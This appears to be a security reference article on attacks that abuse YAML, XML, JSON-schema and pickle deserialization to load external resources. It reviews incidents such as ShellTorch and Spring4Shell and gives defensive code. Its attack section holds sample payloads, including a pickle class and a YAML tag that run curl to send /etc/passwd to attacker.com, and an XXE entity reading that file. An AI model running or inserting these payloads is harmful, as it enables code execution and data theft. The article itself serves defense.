Serialized Data External Linking
Serialized Data External Linking is a subtechnique of Request Forgery where attackers exploit serialization mechanisms to force applications into loading or processing data from external sources. This technique is particularly dangerous in modern applications that use serialization formats like YAML, JSON, or XML for configuration and data exchange. When successful, external linking attacks can lead to remote code execution, data exfiltration, or service compromise by tricking applications into processing malicious external resources.
Examples in the Wild
Notable External Linking Attacks:
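ShellTorch (CVE-2023-43654)
ShellTorch is a chain of vulnerabilities in PyTorch's TorchServe model server, disclosed by Oligo Security in 2023. CVE-2023-43654 is a server-side request forgery flaw in the management API that allowed a model to be registered from an arbitrary remote URL. Chained with unsafe SnakeYAML deserialization (CVE-2022-1471) during model configuration loading, it gave attackers a path to remote code execution and data exfiltration:
- Reported to affect TorchServe deployments on major cloud AI platforms (Google Cloud AI, AWS SageMaker, Azure ML)
- Exploited model configuration loading
- Chained SSRF with unsafe YAML deserialization for enhanced impact
- Put hosted models and data at risk of theft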
ShadowRay Attack
The ShadowRay attack leveraged external linking in Ray's distributed training infrastructure to:
- Load malicious model configurations
- Access sensitive training data
- Exfiltrate proprietary models
- Compromise training pipelines
Spring Framework RCE (CVE-2022-22965)
The Spring4Shell vulnerability demonstrated how external linking in data binding could lead to RCE:
- Affected Spring Framework 5.3.0 to 5.3.17 and 5.2.0 to 5.2.19, as well as older unsupported versions
- Exploited class loading mechanisms
- Allowed arbitrary code execution
- Impacted numerous enterprise applications
Attack Mechanism
Common External Linking Techniques:
- YAML External Entity Loading
    # Malicious YAML configuration
    model_config: !include http://attacker.com/malicious.yml
    # Or more directly:
    !!python/object/apply:os.system
    - 'curl http://attacker.com/exfil?data=$(cat /etc/passwd)'
- XML External Entity (XXE)
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE data [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <config>
      <setting>&xxe;</setting>
    </config>
- JSON Schema Reference
    {
      "$schema": "http://attacker.com/schema.json",
      "type": "object",
      "properties": {
        "malicious": {
          "$ref": "http://attacker.com/payload.json"
        }
      }
    }
- Python Pickle Exploitation
    # Malicious pickle payload
    import os
    import pickle

    class Evil:
        def __reduce__(self):
            # On unpickling, pickle calls os.system with this argument
            return (os.system, ('curl http://attacker.com/exfil?data=$(cat /etc/passwd)',))

    # Serialized and sent to target
    payload = pickle.dumps(Evil())
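One common mitigation for the pickle technique above is to restrict which globals an unpickler may resolve, following the pattern described in the Python `pickle` documentation. The sketch below is a minimal illustration rather than a complete defense: `RestrictedUnpickler`, `restricted_loads`, and the `SAFE_BUILTINS` allowlist are names chosen here for illustration, and a real allowlist depends on what the application legitimately needs to load.

```python
import builtins
import io
import pickle

# Hypothetical allowlist: only these builtins may be resolved during unpickling.
SAFE_BUILTINS = frozenset({"range", "complex", "set", "frozenset", "slice"})


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses to resolve any global outside the allowlist."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Anything else (os.system, subprocess.Popen, ...) is rejected
        # before the unpickler can call it.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Analogue of pickle.loads() that uses the restricted unpickler."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers such as dicts, lists, and integers never reach `find_class`, so ordinary data still loads, while a payload that references `os.system` fails with `pickle.UnpicklingError` before any code runs. Where possible, avoiding pickle entirely for untrusted input remains the safer choice.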
Detection Challenges
Why Traditional Security Tools Fail:
- Format Diversity
    # Multiple serialization formats
    data_formats:
      - yaml: "complex resolution"
      - xml: "entity expansion"
      - json: "schema references"
      - pickle: "code execution"
    # How to handle all formats?
- Resolution Complexity
    # Resource resolution
    external_resources:
      - http: "remote loading"
      - file: "local access"
      - custom: "protocol handlers"
    # How to track resolution?
- Context Sensitivity
    # Context variations
    usage_contexts:
      - config_loading: "startup"
      - data_processing: "runtime"
      - api_requests: "dynamic"
    # When to validate?
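To make the format-diversity problem concrete, the following sketch shows one way a pre-parse check might dispatch to a different scanner per text format. It uses only the Python standard library and is an assumption-laden illustration: the function names, the `SCANNERS` table, and the list of risky YAML tags are all hypothetical, and binary formats such as pickle are left out because they need a different approach than text scanning.

```python
import json
import re
from urllib.parse import urlsplit
from xml.parsers import expat

# Tags taken from the YAML example earlier; a real deployment would tune this.
_YAML_RISKY_TAG = re.compile(r"!!python/|!include\b")


class _DoctypeFound(Exception):
    """Raised from the expat handler to stop parsing at the first DOCTYPE."""


def _scan_yaml(text):
    # Flags language-specific or include tags without parsing the YAML.
    return [f"yaml tag: {m.group(0)}" for m in _YAML_RISKY_TAG.finditer(text)]


def _scan_xml(text):
    # Flags any DOCTYPE declaration, which is where entities are defined.
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise _DoctypeFound(name)

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(text, True)
    except _DoctypeFound as exc:
        return [f"xml doctype: {exc}"]
    except expat.ExpatError:
        return ["xml: not well-formed"]
    return []


def _scan_json(text):
    # Flags "$ref"/"$schema" values that are absolute URIs (have a scheme),
    # as opposed to local pointers such as "#/definitions/x".
    findings = []

    def walk(node):
        if isinstance(node, dict):
            for key, value in node.items():
                if key in ("$ref", "$schema") and isinstance(value, str):
                    if urlsplit(value).scheme:
                        findings.append(f"json {key}: {value}")
                walk(value)
        elif isinstance(node, list):
            for item in node:
                walk(item)

    walk(json.loads(text))
    return findings


SCANNERS = {"yaml": _scan_yaml, "xml": _scan_xml, "json": _scan_json}


def find_external_references(fmt, text):
    """Run the scanner for the declared format; unknown formats fail closed."""
    if fmt not in SCANNERS:
        raise ValueError(f"unsupported format: {fmt}")
    return SCANNERS[fmt](text)
```

A scanner like this is only a first filter. The YAML check in particular is a text match, so it can be evaded or produce false positives, and it does not replace loading YAML with a safe loader or disabling DTD processing in the XML parser itself.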
Required Application Security Strategy:
# External linking protection
- rule: "Resource Resolution"
  condition: |
    data.contains_external_reference AND
    reference.source_not_trusted AND
    reference.protocol_dangerous
  severity: critical
# Format validation
- rule: "Format Security"
  condition: |
    format.allows_code_execution OR
    format.enables_file_access OR
    format.permits_network_calls
  severity: high
# Runtime protection
- rule: "Runtime Control"
  condition: |
    runtime.loading_external_resource OR
    runtime.resolving_reference OR
    runtime.executing_loaded_code
  severity: critical
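As a rough illustration of how the "Resource Resolution" rule might be evaluated against a single reference, the sketch below maps each clause of the condition to a boolean. The rule syntax above is not tied to any specific engine, so everything here is an assumption: the `Verdict` type, the `check_resource_resolution` function, and the `TRUSTED_HOSTS` and `DANGEROUS_SCHEMES` policy values are hypothetical.

```python
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

# Illustrative policy values, not taken from any real product.
TRUSTED_HOSTS = frozenset({"config.internal.example"})
DANGEROUS_SCHEMES = frozenset({"file", "ftp", "gopher", "http", "jar"})


@dataclass(frozen=True)
class Verdict:
    rule: str
    severity: str
    reference: str


def check_resource_resolution(reference: str) -> Optional[Verdict]:
    """Return a Verdict when all three clauses of the rule hold, else None."""
    parts = urlsplit(reference)
    # A reference with a scheme points outside the current document.
    contains_external_reference = bool(parts.scheme)
    # hostname is None for URLs like file:///etc/passwd, which counts as untrusted.
    source_not_trusted = parts.hostname not in TRUSTED_HOSTS
    protocol_dangerous = parts.scheme in DANGEROUS_SCHEMES
    if contains_external_reference and source_not_trusted and protocol_dangerous:
        return Verdict("Resource Resolution", "critical", reference)
    return None
```

Because the clauses are joined with AND, a reference to an untrusted host over a scheme outside `DANGEROUS_SCHEMES` passes this particular rule. Whether that is acceptable is a policy decision; a stricter variant would treat any untrusted host as a match.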
Key Detection Requirements:
- Resource Validation
  - Source verification
  - Protocol restriction
  - Content validation
- Format Control
  - Safe deserialization
  - Reference limitation
  - Execution prevention
- Runtime Monitoring
  - Resource loading tracking
  - Reference resolution logging
  - Execution context validation
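For the runtime monitoring requirements, one possible starting point in Python is the audit hook mechanism added in Python 3.8, which lets a process observe events such as global lookups during unpickling and outbound requests. The sketch below is a minimal example under stated assumptions: `observed_events`, `install_monitor`, and the choice of watched events are illustrative, and the in-memory list stands in for whatever logging pipeline a deployment actually uses.

```python
import sys

# Audit event names raised by CPython's standard library (Python 3.8+).
WATCHED_EVENTS = frozenset({"pickle.find_class", "urllib.Request", "socket.connect"})

# In-memory record for this sketch; a real system would forward these elsewhere.
observed_events = []


def _record_resolution(event, args):
    """Audit hook: record events that indicate reference resolution or loading."""
    if event in WATCHED_EVENTS:
        # Store repr() strings so the log does not keep live objects around.
        observed_events.append((event, tuple(repr(a) for a in args)))


def install_monitor():
    """Register the hook. Audit hooks cannot be removed once added."""
    sys.addaudithook(_record_resolution)
```

After `install_monitor()` is called, unpickling data that references a global or opening a URL with `urllib.request.urlopen` adds an entry to `observed_events`. The hook runs for every audit event in the process, so it should stay cheap and avoid raising exceptions unintentionally.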